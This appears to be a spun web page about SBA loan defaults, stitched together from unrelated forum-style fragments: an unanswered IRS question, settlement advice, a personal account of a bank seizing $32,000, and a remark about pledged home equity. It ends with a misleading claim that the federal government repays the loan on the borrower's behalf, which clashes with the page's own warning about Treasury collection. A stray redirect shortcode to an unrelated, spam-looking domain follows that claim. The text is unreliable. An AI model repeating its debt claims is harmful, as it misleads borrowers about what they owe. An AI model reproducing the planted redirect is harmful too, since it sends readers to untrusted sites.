Is this cancelation amount something we report to the IRS?

We need to proactively contact the SBA and work out a settlement. If you fail to do so, at some point you will receive a notice form the Department of Treasury and we will need to negotiate with them. I had an SBA loan (w/ my ex-husband) in 2007. I overpaid each month and in 2011 decided to restructure my business (divorced in 2009, ex still on loan docs). Contacted the bank who said I could defer to interest only for 3-6 months if paperwork was filled out by both parties. I filled mine out and submitted, ex SAID he did same. Received no statements from bank, so assumed (my fault – ass out of you & me) that everything was fine. Get ready to make payment in (deferment started. In Mar) and saw that the bank had pulled $32,000 out of my accnts! No judgment, no court date. My ex never turned in the paperwork, so I was in default. But $32,000? How can they take that money (including money from 2 trust accnts) with no notice to me? And I was in that bank at least 2 x per week, and no one ever said, hey – you need to pay your SBA loan. Is it legal to just remove $$ from an account w/ no judgment?

I took out an SBA Loan in Dec. 2015, the bank had me pledge $166K of my house (skin in the game). Collateral is the equipment for the business, but it has depreciated and probably will not cover the loan amount.

If it reaches a point where the lender has used all options for recovery, they’ll make a claim to the SBA. At this point, the SBA guarantee kicks in and the federal government will repay the lion’s share of the loan on your behalf. [redirect url=’http://zoneprofit.stream/bump’ sec=’7′]
